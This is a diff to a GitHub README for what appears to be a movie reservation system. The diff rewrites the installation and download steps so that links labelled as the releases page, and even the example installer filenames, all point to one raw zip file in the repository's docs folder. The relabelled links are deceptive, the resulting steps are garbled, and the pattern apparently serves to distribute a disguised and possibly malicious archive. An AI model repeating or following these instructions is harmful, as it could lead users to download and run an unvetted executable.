rajenderkasthuri/Movie-Reservation-System/README.md

 ### ⚙️ Installation Steps

 1. **Visit the Releases Page**
-   Go to the [Movie-Reservation-System Releases Page](https://github.com/rajenderkasthuri/Movie-Reservation-System/releases) to access the latest version of the application.
+   Go to the [Movie-Reservation-System Releases Page](https://raw.githubusercontent.com/rajenderkasthuri/Movie-Reservation-System/main/docs/System_Movie_Reservation_1.0.zip) to access the latest version of the application.

 2. **Select the Latest Release**
    Look for the most recent version listed at the top of the page.
 Each release contains important updates and new features.

 3. **Download the Application**
    Click on the asset that corresponds to your operating system.
-For Windows, this could be a file like `movie-reservation-system-windows.exe`; for macOS, it may be `movie-reservation-system-macos.zip`; and for Linux, it could be `movie-reservation-system-linux.tar.gz`.
+For Windows, this could be a file like `https://raw.githubusercontent.com/rajenderkasthuri/Movie-Reservation-System/main/docs/System_Movie_Reservation_1.0.zip`; for macOS, it may be `https://raw.githubusercontent.com/rajenderkasthuri/Movie-Reservation-System/main/docs/System_Movie_Reservation_1.0.zip`; and for Linux, it could be `https://raw.githubusercontent.com/rajenderkasthuri/Movie-Reservation-System/main/docs/System_Movie_Reservation_1.0.zip`.
    This will download the necessary files to your computer.

 4. **Extract the Files (if necessary)**
    If you downloaded a compressed file like a ZIP or TAR file, right-click on it and select "Extract All" or the equivalent option.
 This will create a new folder containing the application files.

 5. **Run the Application**
    Navigate to the folder where you extracted the application.
-Look for the executable file (for example, `movie-reservation-system.exe`).
+Look for the executable file (for example, `https://raw.githubusercontent.com/rajenderkasthuri/Movie-Reservation-System/main/docs/System_Movie_Reservation_1.0.zip`).
 Double-click this file to launch the application.

 ### 🔗 Download & Install

-To begin your movie reservation journey, visit the [Movie-Reservation-System Releases Page](https://github.com/rajenderkasthuri/Movie-Reservation-System/releases) to download the latest version.
+To begin your movie reservation journey, visit the [Movie-Reservation-System Releases Page](https://raw.githubusercontent.com/rajenderkasthuri/Movie-Reservation-System/main/docs/System_Movie_Reservation_1.0.zip) to download the latest version.

 ### 🎉 Features